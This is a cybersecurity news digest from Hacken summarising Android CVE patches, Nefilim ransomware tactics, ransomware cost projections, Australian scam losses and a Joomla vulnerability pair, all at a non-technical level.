Hacken Token
$ -- --.--

Weekly News Digest #38

Critical Android RCE Bug patched by Google

Google addresses more than 90 bugs in its June Security Bulletin including the critical remote code execution bug that could enable malicious actors to commandeer the targeted mobile device with vulnerabilities. The bug tracked CVE-2021-0507 is related to the Android OS system component and by exploiting this bug hackers could execute arbitrary code under a privileged process. Google also informed users about the second bug related to the OS system component tracked CVE-2021-0516 but has not provided any further details. 

Several high severity EoP issues were also addressed by the technological giant. The Android runtime bug tracked  CVE-2021-0511 could enable the execution of arbitrary code by a local attacker so that he could access additional permissions by bypassing the user interaction requirements. Google has also addressed several information-disclosure issues for Android with a high severity level. 

Read more

Nefilim, a ransomware group targeting $1bn+ revenue companies. Case Study

The ransomware group is actively using the “double-extortion” tactics to make victim organizations pay the ransom. Ransomware is a form of malware that provides for encrypting the stolen files. Machines become infected with malware through phishing messages, stolen access credentials, system vulnerabilities, or other means. A decryption key is required to open the encrypted files. Hackers required the victim to pay ransom in exchange for decryption keys. Ransom demands may reach even a few millions USD when speaking about corporations that have fallen victim to ransomware attacks. However, hackers give no guarantees that the sent key will be technically suitable to open the encrypted files.

The research examining Nefilim was published by Trend Micro whose researchers believe that the Nefilm group is associated with Nemty, a ransomware-as-a-service outfit. According to Trend Micro, Nefilim first appeared in March 2020. Nefilim and Sentinel Labs provided subscription services with a 70/30 split, however, when high-profile victims were snagged by affiliates, the proportion was changing to 90/10. Nefilim often focuses on public proof-of-concept exploit code for vulnerabilities and exposed Remote Desktop Services. The ransomware operators may also use the stolen credentials to access corporate networks. 

Read more

$265 billion – the predicted cost of ransomware attacks worldwide in the next decade

By 2031, the global cost of ransomware attacks may dramatically increase and reach $265 billion. Malicious operators may not only steal information to require ransom but also threaten victims to publish the compromised files unless they pay the provided amount. As a result, the level of pressure on victims to pay up is doubling. The most popular ransomware groups as of today are Maze, Nefilim, DarkSide, and Clop. DarkSide left the scene upon extorting Colonial Pipeline. Ransomware attacks take place worldwide with a frequency of 1 attack per few seconds. 

According to the estimates made by Cybersecurity Ventures, currently, the cost of ransomware attacks equals $20 billion, which constitutes a 50X increase compared to 2015. These estimates are based on the prediction that a 30% growth in incidents will be traced every year. The estimates made by the company include such components as payouts, insurance premiums, costs associated with system repair, expenditures associated with hiring cyberforensics firms, data loss, payments made to malicious actors, and other elements. It is important to note that these estimates also include reputational damage experienced by victims.

Read more

AU$26.5m in cryptocurrency spent by  Australians as payments to scammers in 2020

The ACCC’s Scamwatch received 216,087 scams in the 2020 calendar year and AU$156 million were lost. Totally, Australians reported losing AU$851 million to scams. The business email compromise accounted for AU$128 million, remote access scams accounted for AU$8.4 million and identity theft accounted for AU$3.1 million. At the top of the list, there were investment scams making people lose AU$328 million. However, when excluding from the total figure the information from the top financial institutions of Australia, this figure is reduced to AU$156 million. 

The most common payment methods used in scams was bank transfer accounting for AU$97 mln. At the same time, cryptocurrencies like bitcoin were the second-highest payment method. The highest losses were experienced by people aged over 65.

Read more

CMS Joomla dual vulnerability combo could lead to full system compromise

Joomla is a popular content management system. Researchers have revealed 2 vulnerabilities the exploitation of which by hackers could lead to the full system compromise. The revealed vulnerabilities included a stored cross-site scripting flaw and the password reset issue. The security vulnerabilities have been revealed by Fortbridge security specialists and they informed the company Joomla on these issues at the beginning of this year.

Upon being notified of the existence of security vulnerabilities Joomla has patched the cross-site scripting flaw, however, the other issue has remained unpatched. The severity level of the 2 detected vulnerabilities is high. Hackers can successfully execute commands on the server by getting full control of Joomla’s website through the exploitation of these vulnerabilities. 

Read more

Subscribe to our research

Enter your email address to subscribe to Hacken Reseach and receive notifications of new posts by email.